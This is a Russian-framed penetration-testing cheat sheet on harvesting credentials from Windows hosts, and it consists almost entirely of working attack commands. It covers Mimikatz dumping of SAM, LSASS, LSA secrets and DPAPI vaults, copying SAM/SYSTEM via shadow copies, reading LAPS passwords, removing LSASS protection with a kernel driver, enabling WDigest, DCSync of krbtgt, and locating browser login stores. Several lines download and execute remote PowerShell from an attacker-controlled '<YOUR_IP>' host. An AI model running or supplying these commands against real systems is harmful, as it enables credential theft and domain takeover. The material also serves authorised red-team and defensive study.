Сбор учётных данных (Windows)
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Закрепите текущий уровень доступа и соберите контекст (ОС, сеть, домен).
- Минимизируйте шум: избегайте лишних действий вне scope.
- Документируйте команды и вывод для отчёта.
- Ниже — заголовки и примеры команд на английском.
Методика
Mimikatz
module::command <patarmeter>
SAM (Local Windows credentials) - Local
"privilege::debug" "token::elevate" "lsadump::sam" "exit"
Obtain SAM & SYSTEM (ShadowCopy)
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
[...]
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[...]
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Windows\Tasks\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Windows\Tasks\system
Obtain SAM & SYSTEM (Windows Registry)
reg save HKLM\sam C:\Windows\Tasks\sam
reg save HKLM\system C:\Windows\Tasks\system
Decrypt SAM with SYSTEM creds
pip2.7 install pycryptodome
git clone https://github.com/Neohapsis/creddump7
python2.7 creddump7/pwdump.py system sam
"lsadump::sam /system:.\system /sam:.\sam" "exit"
secretsdump.py -sam SAM -system SYSTEM [-SECURITY SECURITY] local
Local Administrator Password Solution (LAPS)
Get-ChildItem "$env:ProgramFiles\LAPS\CSE\Admpwd.dll"
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
# Alternative 1
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname
# Alternative 2
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX; Find-LAPSDelegatedGroups
Alternative 1 - LAPSToolkit
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX;
# List all computers that are set up with LAPS and display the hostname, the clear text password, and the expiration time
Get-LAPSComputers
Alternative 2 - Get-ADObject
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1') | IEX
Get-ADObject -Name <COMPUTER_NAME> -DomainController <DC_IP> -Properties ms-mcs-admpwd
Alternative 3 - Metasploit
use post/windows/gather/credentials/enum_laps
set session 1
exploit
Alternative 4 - Get-LAPSPasswords
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/Get-LAPSPasswords.ps1') | IEX;
Get-LAPSPasswords -DomainController <DC> -Credential <DOMAIN>\administrator
Local Security Authority Subsystem Service (LSASS)
"privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::secrets" "exit"
Local Security Authority (LSA) Protection Evasion
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
mimidrv.sys - Invoke-Mimikatz
cmd /c 'sc create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand'
cmd /c 'sc start mimidrv'
Disable PPL
"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "lsadump::secrets" "sekurlsa::dpapi" "exit"
"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::secrets" "sekurlsa::dpapi" "exit"
Dumping LSASS process memory
.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
Data Protection API (DPAPI)
Enumerate
vaultcmd /list
vaultcmd /listcreds:"<VAULT>" /all
# Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
.\Seatbelt.exe WindowsVault
# Windows credential DPAPI blobs
.\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======
Folder : C:\Users\User\AppData\Local\Microsoft\Credentials\
FileName : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
Description : Local Credential Data
MasterKey : bfc5090d-22fe-4058-8953-47f6882f549e
# List DPAPI master keys
.\Seatbelt.exe DpapiMasterKeys
Folder : C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
LastAccessed Last codified FileName
============ ============= ====================================
1/16/2023 5:56:24 PM 487e7db0-f4fh-4301-8248-c225d49c5ah7
1/16/2023 5:56:35 PM bfc5090d-22fe-4058-8953-47f6882f549e
[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module [*] You can also use SharpDPAPI for masterkey retrieval
Obtaining the keys
.\mimikatz.exe !sekurlsa::dpapi
# This will only work if executed in the context of the user who owns the key. If your Beacon is running as another user or SYSTEM, you must impersonate the target user somehow first, then execute the command using the `@` modifier.
mimikatz dpapi::masterkey /rpc /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<FOLDER>\<MASTER_KEY>
Vaul decryption
"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<VAULT_FILENAME> /masterkey:<MASTERKEY>" "exit"
Scheduled Tasks Credentials
.\mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<FILE_NAME>"
.\mimikatz.exe "privilege::debug" "token::elevate" "!sekurlsa::dpapi" "exit"
.\mimikatz.exe dpapi::cred /in:C:\Windows\System32\config\syst
Kerberos Encryption Keys
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::ekeys"'
.\SafetyKatz.exe "sekurlsa::ekeys"
WDigest Authentication
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
.\mimikatz.exe "sekurlsa::wdigest"
Dumping secrets
.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"
secretsdump [-just-dc] <DOMAIN>/<USERNAME>:'<PASSWORD'@<DC>
VPN credentials
C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
"privilege::debug" "token::elevate" "lsadump::secrets" "exit"
[...]
Secret : L$_RasConnectionCredentials#0
cur/hex : 30 00 00 00 00 00 05 00 30 80 ab 62 21 85 f3 42 8a 33 26 87 51 46 82 20 0e 00 00 00 73 00 65 00 63 00 72 00 65 00 74 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 05 00 b5 b0 fe 50 59 98 6d 49 8f 31 4e 4c 77 24 4f 5a 28 00 00 00 79 00 6f 00 75 00 72 00 5f 00 70 00 72 00 65 00 5f 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 d4 dd fb 7c b6 f3 49 47 99 52 56 e9 ef 91 76 41 2a 00 00 00 76 00 70 00 6e 00 5f 00 31 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 5a 39 4b 1f 87 b1 0a 4e aa ad c0 56 3a 3d c1 91 2a 00 00 00 76 00 70 00 6e 00 5f 00 32 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00
DSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"
Browser Credentials
Appdata\\Roaming\\Mozilla\\Firefox\\Profiles\\
AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\
AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data\\